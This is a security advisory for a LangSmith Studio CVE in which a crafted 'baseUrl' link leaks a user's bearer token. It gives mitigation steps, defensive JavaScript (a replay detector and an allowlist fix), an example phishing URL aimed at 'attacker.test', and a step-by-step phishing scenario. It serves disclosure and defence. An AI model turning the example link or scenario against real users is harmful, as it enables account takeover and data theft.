CVE-2026-25750
HIGH
LangSmith Studio, the UI used to monitor LangChain and AI agent pipelines, was affected in both LangSmith Cloud and self-hosted deployments; self-hosted instances remain exposed until the langchain-ai/helm chart is upgraded to 0.12.71. A single phishing link causes an authenticated user's browser to send their bearer token, user ID, and workspace ID to an attacker-controlled server, giving the attacker the victim's permissions in that workspace: traces, prompts, datasets, and any credentials inadvertently captured in logged LLM calls. The token lives only five minutes, but the attack can be repeated with every click. Self-hosted operators should treat this as a critical patch given the direct path to AI pipeline exfiltration.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| langsmith | pip | — | No patch |
Recommended Action
1. PATCH: Upgrade langchain-ai/helm to >= 0.12.71 immediately. For self-hosted, this is the only fix — no workaround exists per vendor advisory.
2. AUDIT: Review LangSmith workspace access logs for any anomalous API calls originating from unexpected IPs in the past 90 days.
3. ROTATE: Rotate all LangSmith API keys and user tokens as a precaution.
4. SCAN TRACES: Audit recent LangSmith traces for inadvertently logged credentials, PII, or sensitive prompts that may now be considered compromised.
5. PHISHING DEFENSE: Brief development and ML teams on this specific attack vector — malicious LangSmith URLs are indistinguishable from legitimate ones without inspecting the baseUrl parameter.
6. DETECTION: Alert on LangSmith authentication from new geographies or user agents within the 5-minute token validity window.
7. ZERO-TRUST: Enforce network-level restrictions on LangSmith instances (allowlist known CI/CD and developer IPs).
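Step 6 as detection logic, as an added example (not LangSmith's code, log schema, or any shipped rule): constructed JSON-style auth events are grouped per user, and an alert is raised when the same user's session is used from a second client (IP plus user agent) within the 5-minute token lifetime, which is what a replayed Studio token looks like from the server side. Event field names and values are invented for the example; adapt `clientKey` to whatever your LangSmith access logs actually carry (the recommended action also mentions geography, which needs an IP lookup not shown here).

```javascript
// Added example, not LangSmith code. The event schema below is constructed for
// illustration; real LangSmith access logs will differ.
const TOKEN_TTL_MS = 5 * 60 * 1000; // 5-minute token lifetime per the advisory

// Constructed sample: u_42 authenticates from a browser, then 2.5 minutes later
// the same user's session exports runs from a different IP and user agent.
const EVENTS = [
  { ts: "2026-02-10T09:00:00Z", user: "u_42", ws: "ws_7", ip: "203.0.113.10", ua: "Mozilla/5.0 (Macintosh) Chrome/122", action: "session.create" },
  { ts: "2026-02-10T09:00:05Z", user: "u_42", ws: "ws_7", ip: "203.0.113.10", ua: "Mozilla/5.0 (Macintosh) Chrome/122", action: "runs.list" },
  { ts: "2026-02-10T09:02:30Z", user: "u_42", ws: "ws_7", ip: "198.51.100.77", ua: "python-requests/2.31", action: "runs.export" },
  { ts: "2026-02-10T09:03:00Z", user: "u_42", ws: "ws_7", ip: "198.51.100.77", ua: "python-requests/2.31", action: "datasets.export" },
  // Hours later from the second client: outside the window, so this rule stays quiet.
  { ts: "2026-02-10T13:15:00Z", user: "u_42", ws: "ws_7", ip: "198.51.100.77", ua: "python-requests/2.31", action: "runs.list" },
  { ts: "2026-02-10T09:01:00Z", user: "u_99", ws: "ws_7", ip: "203.0.113.11", ua: "Mozilla/5.0 (X11) Firefox/123", action: "runs.list" },
];

// Identity of the client as seen by the server. Swap in ASN or geo fields if you have them.
function clientKey(e) {
  return `${e.ip}|${e.ua}`;
}

// Returns one alert per (user, new client) pair whose first activity falls within
// ttlMs of activity from a *different* client for the same user. Events need not
// arrive sorted; they are ordered per user before evaluation.
function detectConcurrentClients(events, ttlMs = TOKEN_TTL_MS) {
  const byUser = new Map();
  for (const e of events) {
    if (!byUser.has(e.user)) byUser.set(e.user, []);
    byUser.get(e.user).push({ ...e, t: Date.parse(e.ts) });
  }

  const alerts = [];
  for (const [user, list] of byUser) {
    list.sort((a, b) => a.t - b.t);
    const lastSeen = new Map(); // clientKey -> timestamp of that client's latest event
    const alerted = new Set();  // clients already reported for this user
    for (const e of list) {
      const key = clientKey(e);
      for (const [otherKey, otherT] of lastSeen) {
        if (otherKey !== key && e.t - otherT <= ttlMs && !alerted.has(key)) {
          alerts.push({
            user,
            ws: e.ws,
            ts: e.ts,
            action: e.action,
            newClient: key,
            priorClient: otherKey,
            secondsSincePrior: (e.t - otherT) / 1000,
          });
          alerted.add(key);
        }
      }
      lastSeen.set(key, e.t);
    }
  }
  return alerts;
}

console.log(JSON.stringify(detectConcurrentClients(EVENTS), null, 2));
```

On the sample above the rule fires once, on the `runs.export` from `198.51.100.77` 145 seconds after the browser session was active; the later `runs.list` from the same client is outside the window and is not reported. Narrowing `ttlMs` to 60 seconds produces no alert, which is the trade-off to tune against how quickly a token is actually replayed in your logs.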
Technical Details
NVD Description
Langchain Helm Charts are Helm charts for deploying Langchain applications on Kubernetes. Prior to langchain-ai/helm version 0.12.71, a URL parameter injection vulnerability existed in LangSmith Studio that could allow unauthorized access to user accounts through stolen authentication tokens. The vulnerability affected both LangSmith Cloud and self-hosted deployments. Authenticated LangSmith users who clicked on a specially crafted malicious link would have their bearer token, user ID, and workspace ID transmitted to an attacker-controlled server. With this stolen token, an attacker could impersonate the victim and access any LangSmith resources or perform any actions the user was authorized to perform within their workspace. The attack required social engineering (phishing, malicious links in emails or chat applications) to convince users to click the crafted URL. The stolen tokens expired after 5 minutes, though repeated attacks against the same user were possible if they could be convinced to click malicious links multiple times. The fix in version 0.12.71 implements validation requiring user-defined allowed origins for the baseUrl parameter, preventing tokens from being sent to unauthorized servers. No known workarounds are available. Self-hosted customers must upgrade to the patched version.
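To make the fix concrete, here is an added example (not LangSmith's or langchain-ai/helm's code) modelling the bug class the description covers: a Studio page reads a `baseUrl` query parameter and hands the session's bearer token to whatever origin it names, beside a hardened resolver that only accepts an operator-defined allowlist of origins. The origins, endpoint path, header names, and the `isSuspiciousStudioLink` mail-filter helper are all assumptions for illustration; LangSmith's actual parameter handling and the allowlist configuration introduced in 0.12.71 are not shown.

```javascript
// Added example, not LangSmith code. All names, origins and endpoints are hypothetical.
const APP_ORIGIN = "https://smith.example.test";                     // assumed Studio origin
const ALLOWED_ORIGINS = new Set([APP_ORIGIN, "https://api.example.test"]); // assumed operator allowlist
const SESSION = { token: "example-token-not-real", userId: "u_42", workspaceId: "ws_7" };

// "Before": trusts baseUrl wholesale, so ?baseUrl=https://attacker.test is honoured.
function vulnerableTarget(pageUrl) {
  return new URL(pageUrl).searchParams.get("baseUrl") ?? APP_ORIGIN;
}

// Resolve a raw baseUrl value against the app origin and admit it only if it is
// https and its origin is allowlisted. Returns the origin or null.
// Catches protocol-relative ("//attacker.test"), userinfo tricks
// ("https://smith.example.test@attacker.test") and non-https schemes.
function resolveAllowedBase(raw, allowed) {
  let candidate;
  try {
    candidate = new URL(raw, APP_ORIGIN);
  } catch {
    return null;
  }
  if (candidate.protocol !== "https:" || !allowed.has(candidate.origin)) return null;
  return candidate.origin;
}

// "After": falls back to the app origin whenever baseUrl is absent or not allowlisted.
function hardenedTarget(pageUrl, allowed = ALLOWED_ORIGINS) {
  const raw = new URL(pageUrl).searchParams.get("baseUrl");
  if (raw === null) return APP_ORIGIN;
  return resolveAllowedBase(raw, allowed) ?? APP_ORIGIN;
}

// Simulated Studio bootstrap: build (but do not send) the request that carries the
// session identity, so we can see where the token would go under each resolver.
function buildTokenRequest(pageUrl, session, resolveTarget) {
  const target = resolveTarget(pageUrl);
  return {
    url: `${target}/api/v1/sessions`, // hypothetical endpoint
    headers: {
      Authorization: `Bearer ${session.token}`,
      "X-User-Id": session.userId,
      "X-Workspace-Id": session.workspaceId,
    },
    leaksOffOrigin: !ALLOWED_ORIGINS.has(new URL(target).origin),
  };
}

// Mail/chat-filter side of step 5: a link to our Studio whose baseUrl would not
// pass the allowlist is the phishing pattern. Links to other sites are out of scope.
function isSuspiciousStudioLink(href, allowed = ALLOWED_ORIGINS) {
  let u;
  try {
    u = new URL(href);
  } catch {
    return false;
  }
  if (u.origin !== APP_ORIGIN) return false;
  const raw = u.searchParams.get("baseUrl");
  if (raw === null) return false;
  return resolveAllowedBase(raw, allowed) === null;
}

const phish = "https://smith.example.test/studio?baseUrl=https://attacker.test";
console.log("vulnerable ->", buildTokenRequest(phish, SESSION, vulnerableTarget).url);
console.log("hardened   ->", buildTokenRequest(phish, SESSION, hardenedTarget).url);
console.log("flag link  ->", isSuspiciousStudioLink(phish));
```

The allowlist is compared on full origin (scheme, host, port), not by substring, so `https://smith.example.test.attacker.test` and `https://smith.example.test@attacker.test` both fall back to the app origin. Note that the filter only catches the parameter name used here; if your deployment's Studio accepts other parameters that name a server, extend `isSuspiciousStudioLink` accordingly.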
Exploitation Scenario
A threat actor targeting an organization's AI pipeline begins by identifying LangSmith usage via job postings referencing LangChain or public GitHub repositories. The attacker registers a lookalike domain (e.g., langsmith-security-notice.com) and sets up a token capture endpoint. They craft a LangSmith URL whose vulnerable baseUrl parameter points at their server and embed it in a spearphishing email: 'Action required: your LangSmith workspace has been flagged for unusual activity — verify your account.' A developer or ML engineer who is already signed in clicks the link; their browser silently transmits the bearer token, user ID, and workspace ID to the attacker's server. Within the token's 5-minute lifetime, the attacker authenticates to LangSmith as the victim, exports all traces (harvesting any OpenAI/Anthropic API keys that were inadvertently captured in logged request headers), downloads evaluation datasets, and maps the organization's AI system architecture from run metadata. If the token expires before the attacker is done, they simply repeat the phishing attempt: the vulnerability requires no elevated access and can be exploited as often as the victim clicks.
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
References
- github.com/langchain-ai/helm/security/advisories/GHSA-r8wq-jwgw-p74g Vendor